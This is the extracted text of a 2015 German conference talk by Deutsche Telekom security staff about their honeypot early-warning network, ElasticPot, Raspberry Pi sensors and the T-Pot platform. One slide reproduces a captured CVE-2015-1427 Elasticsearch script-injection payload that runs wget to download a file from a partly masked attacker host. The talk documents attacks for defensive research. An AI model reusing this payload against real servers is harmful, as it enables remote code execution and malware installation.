HONEYPOTS @ DTAG: Doing things the right way...

MARCO OCHSE – DR. MARKUS SCHMALL, GROUP SECURITY SERVICEJUGS Meeting, 15. Oktober 2015

INHALTE

22.10.15 2

§ Wer sind wir

§ Historie

§ Hintergründe

§ Anwendungsfälle

§ Frühwarnung

§ T-POT / Docker

WER SIND WIR

22.10.15 3

§ Group Security Service § Senior Experte Sicherheit in Office &

Portalsystemen § T-Pot Main Entwickler§ Mobile-Gadget-Nerd

Marco Ochse

§ Group Security Service§ Leiter Application Security & Testing§ Frühwarnsystem & Honeypot-Development § Rapid PrototyperJ

Markus Schmall

22.10.15 4

Wann wurde der erste Honeypot gebaut ?

WANN WURDE DER ERSTE HONEYPOT GEBAUT ?

22.10.15 5

1988 / 1989 – Clifford Stoll

HONEYNET PROJECT

22.10.15 6

§ Gegründet 1999 von Lance Spitzner

§ Vereinigung von Honeypot Entwicklern (Glastopf, Honeytrap, Dionaea, …) und Betreibern (u.a. Shadowserver Foundation, DTAG …)

§ Autor der “Know your Enemy” Reihe§ https://www.honeynet.org/challenges

AUSGANGSLAGEABUSE / IP Speicherung

§ > 2.000.000 Hinweise pro Monat§ >100000 Emails an Kunden pro Monat

Wichtig: Ohne sieben Tage IP Speicherung ist keine Kundeninformation möglich.

HINWEISE SEIT JAHREN AUF HOHEM NIVEAU

22.10.15 7

HINWEISGEBER

FRÜHWARNUNGANGRIFFSERKENNUNG DURCH HONEYPOTS

§ Weltweit verteiltes Sensornetzwerk aus etwa 180 Honeypots und Application-Level-Firewalls

§ Platzierung in Rechenzentren, DSL Anschlüssen, Mobile IP Bereichen…)

§ Sensoren basieren auf Open Source Software wie kippo, honeytrap, dionaea, glastopf, mysqlpot, servletpot, nodepot, elasticpot, modsecurity…

§ Simulation diverser Dienste wie mysql, mssql, http, ftp, ssh, sip, smb, elasticsearch, smtp …

§ Simulation bekannter Schwachstellen, teilweise selbstlernend

§ Übermittlung an zentrales Frühwarnsystem

ANGRIFFE IN ECHTZEIT AUFNEHMEN

22.10.15 8

CYBER-ANGRIFFE NACHVOLLZIEHEN

FRÜHWARNUNGECHTZEITLAGEBILDER DURCH FRÜHWARNSYSTEM

VERTEILTES SENSORNETZ

§ Zentrales Auswertesystem („Early WarningSystem“) nimmt Sensordaten entgegen und wertet Angriffe aus

§ Partner aus der Industrie, Forschung und der öffentlichen Hand angeschlossen

§ Vollautomatisierte Weiterverarbeitung der Angriffsdaten

§ Ausleitung von Schadsoftware an Antiviren-Industrie

§ Forschung zusammen mit Intel / Ben Gurion / IL§ Erstellung von Statistiken§ Generierung von Alarmen / Benachrichtigungen§ ca. 2000 unterschiedliche Angreifer/Tag§ bis zu 4.000.000 Angriffe/Tag

ZENTRALE AUSWERTUNG UND VERARBEITUNG

22.10.15 9

FRÜHWARNUNGBEISPIEL ELASTICSEARCH HONEYPOT

22.10.15 10

CVE-2015-1427 (

{"query":+{"filtered":+{"query":+{"match_all":+{}}}},+"script_fields":+{"exp":+{"script":+”import+java.util.*;

import+java.io.*;

String+str+=+\"\";BufferedReader+br+=+new+BufferedReader(new+InputStreamReader(Runtime.getRuntime().exec(\"wget+-O+/tmp/Sekey+http://222..x.y.z:5665/Sekey\").getInputStream()));

StringBuilder+sb+=+new+StringBuilder();

while((str=br.readLine())!=null){sb.append(str);sb.append(\"\r\n\");}sb.toString();"}},+"size":+1}

ElasticPot: Grails2.5.1, Redis DB, Alphaversion auf github (https://github.com/schmalle/ElasticPot)

FRÜHWARNUNG DETAILS PLATTFORM

22.10.15 11

WebService Interface (PUT ALARMS, GET BAD IPS, GET NEW ALARMS)

§ Grails Anwendung im Tomcat Container§ Software Loadbalancing auf Basis Apache 2.4§ DB Interface auf Basis OR Mapper§ Native Elastic Search API§ CVE Detektion

Datenbank

§ Initial MySQL, jetzt Mongo DB und ElasticSearch im Cluster

Objekte

§ Alarm (IP, Datum)§ Request (HTTP Request, binary, )§ Peer (Honeypot)

Apache / Tomcat

DB Layer

FRÜHWARNUNG DETAILS PLATTFORM (II)

22.10.15 12

FrontEnd / Management UI

Technologien

§ Grails 2 (+ Spring Security)§ JQuery§ Bootstrap 3

Informationen / SDK

§ https://github.com/dev-t-sec/BadIPFetch (SDK für Abfrage Bad IPs)§ dtag-dev-sec.github.io

FRÜHWARNUNGIDEE 2013: GÜNSTIG SENSORBREITE ERHÖHEN

RASPBERRY PI

§ Sensor-Appliances auf Basis von Low-CostHardware „RaspberryPi“

§ Vorkonfigurierte System Images mit HoneypotSoftware / Raspbian ohne X

§ Zwei Simulationstypen / Honeypot-Setups

§ 80 vorkonfigurierte Geräte an Landesgesellschaften verteilt

§ Minimale Kosten§ Plug'n‘Play

§ Zentrales Management via Puppet

HONEYPOT APPLIANCES

22.10.15 13

FRÜHWARNUNG PUPPET

22.10.15 14

node default{

include ewsposterinclude configpuppetinclude ewsposter_beta

}

class configpuppet{

file { '/etc/puppet/puppet.conf': ensure => present,owner => "root", group => "root", source => "puppet://$d/puppet.conf"

}}

CYBER-AIKIDO

Das Ziel beim Aikidō ist, die Kraft […] abzuleiten (Abwehr) und dieselbe Kraft intelligent zu nutzen, um den Gegner vorübergehend angriffsunfähig zu machen (Absicherung), ohne ihn dabei schwer zu verletzen. Quelle: Wikipedia

FRÜHWARNUNG ZIEL: INFORMATIONEN AUS ANGRIFFEN GENERIEREN

22.10.15 17

SICHERHEITSTACHO.EU

NUTZBARMACHUNG VON HONEYPOT DATEN

FRÜHWARNUNG ZIEL: EIGENE SYSTEME SCHÜTZEN

22.10.15 19

§ Vor existierenden Webserver wird Modul installier t, welches auftreffende Anfragen abfängt und die IP Adresse mit einer Blackliste vergleicht und bei positivem Befund wird auf eine CaptchaSeite geleitet.

§ User kann sich selbst freischalten.

§ Realisierung als HTTP Servlet Filter

§ Vorteil: Keine Aussperrung legitimer Benutzer

Use CaseEINLASSKONTROLLE DYNAMIC WEB DEFENDER

FRÜHWARNUNG ZIEL: KUNDEN SCHÜTZEN

§ Erscheinen IP Adressen aus DTAG IP Bereichen lösen diese eine Information des Abuse Teams aus

§ DTAG Abuse Team übernimmt die Information von Endkunden (DSL, Businessendkunden und Privatendkunden) bei Verdacht auf Infektion von Rechnersystemen

§ Durchschnittlich 100.000 Anschreiben an DSL Endkunden pro Monat

§ Alarmierungen von Partnern bei Zugriffen aus deren Netzen auch für Kundeninformation nutzbar

KUNDENINFORMATION DURCH ABUSE-TEAM

22.10.15 20

§ Der DSL Router warnt den Benutzer im heimischen Netzwerk, wenn die öffentliche IP Adresse des Routers („public IP“) im Frühwarnnetz aufgefallen ist

§ Zeitnahe Kundeninformation über Infektionen im heimischen Netz

§ Technische Realisierung im Router § IFA 2013: OpenRouter§ 2016: Launch vor Kunde

AUSBLICK: DSL HOME USER PROTECTION

2014 – Umdenken

T-POT

UMDENKENBESTANDSAUFNAHME

§ Full blown, low-cost, Vir tualisierung … § Performance, Architektur Support,

§ RZ security policies, NetzwerkTrennung§ Begrenzte Anzahl von Honeypots pro Gerät

HARDWARE

22.10.15 22

§ Debugging Aufwändungen, Hauptsächlichmanuell

§ Config Management aufwendig (recipes)§ Externer Zugriff kritisch und notwendig§ Deployments / Defragmentation unvermeidbar

WARTUNG

§ Hauptsächlich händisch, Unterstützung nötig§ Keine “One-4-All-Lösung”, Setup personalisiert§ Gemischte Erfahrungen und Eindrücke mit

Management Tools

DEPLOYMENT

§ Zentrale Datenhaltung mit großen Datenmengen§ Zeitaufwand durch manuelle Datenanalyse§ Jäger und Sammler => Intelligente Filter

DATEN AGGREGATION

UMDENKEN

UMDENKENEVOLUTION & INNOVATION

§ Multi Platform Support§ One-4-All-Lösung

§ Vir tuelle Umgebungen (VMWare, VBox, etc.)§ Cloud Support (EC2, AWS, Google Cloud, …)

HARDWARE

22.10.15 24

§ Automatische Updates§ Reduktion der Wartung auf Client (wenig>0)§ Selbstüberwachung§ Externer Zugriff nur optional

WARTUNG

§ (Halb)-Automatischer Installationsvorgang§ Reproduzierbarkeit der Installationen§ Community / Open Source Lösung§ Viele Honeypots gleichzeitig auf einer Instanz

DEPLOYMENT

§ Zentrale Datenverarbeitung (Sicherheitstacho)§ Zentrale UI (Community Dashboard)§ Lokale UI (ELK Stack)

DATEN AGGREGATION

T-POT: A MULTI-HONEYPOT PLATFORM

T-POT: A MULTI-HONEYPOT PLATFORM

22.10.15 26

T-POT: COMMUNITY DASHBOARD

22.10.15 27

INTERNATIONALERHONEYPOT ROLLOUT

http://community.sicherheitstacho.eu

T-POT BASIERT AUF DOCKER